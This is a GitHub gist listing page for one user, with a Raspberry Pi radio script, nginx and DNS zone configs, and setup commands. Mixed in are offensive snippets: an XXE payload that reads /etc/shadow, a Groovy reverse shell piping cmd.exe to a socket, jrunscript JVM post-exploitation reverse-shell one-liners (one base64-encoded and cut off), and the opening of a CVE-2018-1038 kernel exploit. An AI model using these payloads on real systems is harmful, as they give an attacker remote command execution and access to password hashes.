Skip to content

Instantly share code, notes, and snippets.

View ihebski's full-sized avatar
:atom:

Ihebski ihebski

:atom:
815 followers · 891 following
View GitHub Profile
@ihebski
ihebski / gist:d9c4b4a8444e7a98f747e68c0e0e5d74
Created April 5, 2016 23:12 — forked from miguelalonso/gist:35690910cf6914cf229e
Raspi read NRF24L01
#!/usr/bin/python
# raspberry pi nrf24l01 hub
# more details at http://blog.riyas.org
# Credits to python port of nrf24l01, Joao Paulo Barrac & maniacbugs original c library
from nrf24b import NRF24
import time
from time import gmtime, strftime
import sys, string
@ihebski
ihebski / xxe.xml
Created March 29, 2017 22:03
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
@ihebski
ihebski / revsh.groovy
Created March 5, 2019 14:06 — forked from frohoff/revsh.groovy
Pure Groovy/Java Reverse Shell
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@ihebski
ihebski / JVM_POST_EXPLOIT.md
Created July 29, 2019 22:27 — forked from frohoff/JVM_POST_EXPLOIT.md
JVM Post-Exploitation One-Liners

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@ihebski
ihebski / pinet-VM
Created April 21, 2020 11:56
# change keyboard to fr
sudo dpkg-reconfigure keyboard-configuration
# upgrade system
sudo apt-get update
sudo apt full-upgrade -y
# ifconfig tools
sudo apt install net-tools
@ihebski
ihebski / CVE-2018-1038-with-memorycheck.c
Created April 24, 2018 22:20 — forked from xpn/CVE-2018-1038-with-memorycheck.c
https://blog.xpnsec.com/total-meltdown-cve-2018-1038/
#include "stdafx.h"
#define PML4_BASE 0xFFFFF6FB7DBED000
#define PDP_BASE 0xFFFFF6FB7DA00000
#define PD_BASE 0xFFFFF6FB40000000
#define PT_BASE 0xFFFFF68000000000
typedef LARGE_INTEGER PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
#pragma pack(push,4)
@ihebski
ihebski / add new domain
Last active April 21, 2020 11:59
findomain-linux -o -t $TARGET -r | anew $TARGET.txt
@ihebski
ihebski / template
Created April 25, 2020 13:23
template ngnix
server {
listen 80;
listen [::]:80;
root /usr/share/ngnix/domain;
index index.html index.htm index.nginx-debian.html;
server_name _;
}
@ihebski
ihebski / takengo.com.db
Created April 26, 2020 12:31
config dns zone
; BIND data file for takengo.com
;
$TTL 14400
@ IN SOA ns1.takengo.com. host.takengo.com. (
201006601 ; Serial
7200 ; Refresh
120 ; Retry
2419200 ; Expire
604800) ; Default TTL
;
@ihebski
ihebski / rev.3.2.1.in-addr.arpa
Created April 26, 2020 17:01
@ IN SOA takengo.com. host.takengo.com. (
2010081401;
28800;
604800;
604800;
86400 );
IN NS ns1.takengo.com.
4 IN PTR takengo.com.